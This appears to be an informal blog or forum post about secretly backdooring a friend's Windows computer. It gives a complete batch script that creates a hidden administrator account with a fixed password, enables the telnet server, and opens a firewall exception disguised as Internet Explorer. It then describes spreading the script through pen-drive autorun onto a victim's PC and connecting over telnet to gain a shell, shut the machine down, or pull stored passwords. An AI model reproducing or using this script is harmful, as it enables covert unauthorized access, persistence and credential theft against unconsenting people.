Don’t trust Your Friend.. Lol.. Here what he can Do!! Always Check Your User Accounts.
If you have physical access to ur friends machine then u can access his machine remotely using telnet server. All u have to do is to create a user account there then hide that user from logon screen and then start telnet server and finally mark telnet as a exception in firewall.These stepes can be carried out simply and faster using a simple batch file(instal.bat). Here i m providing the source of batch file:
net user IE_USR 123456 /add
net localgroup administrators IE_USR /add
net localgroup “remote desktop users” IE_USR /add
sc config tlntsvr start= auto
netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe iexplorer enable
sc start tlntsvr
reg add “HKLM\software\microsoft\windows NT\CurrentVersion\winlogon\specialaccounts\UserList” /v IE_USR /t REG_DWORD /d 0
Now u can make this file to spread from one machine to another according to ur own method like to spread this file as a autoplay program in pen drives. Here i m providing u the code for autoplaying just put these two files in pen drive and u r work is done.
[autorun]when the victim plug this pen drive in his/her PC instal.bat runs and it will do all the work for u then u meet ur frnd online on yahoo msgr and use start>run>netstat -n 4 [press enter] to find his ip address. After getting the ipaddress goto start>run>telnet ipaddress [press enter] now press y and then use these login detail to get login
Now u have the shell prompt of friend machine now u can do anything u can see what task are running there using tasklist command, u can shutdown his machine using shutdown -s, u can even get stored password from registry, u can do almost everthing from command prompt.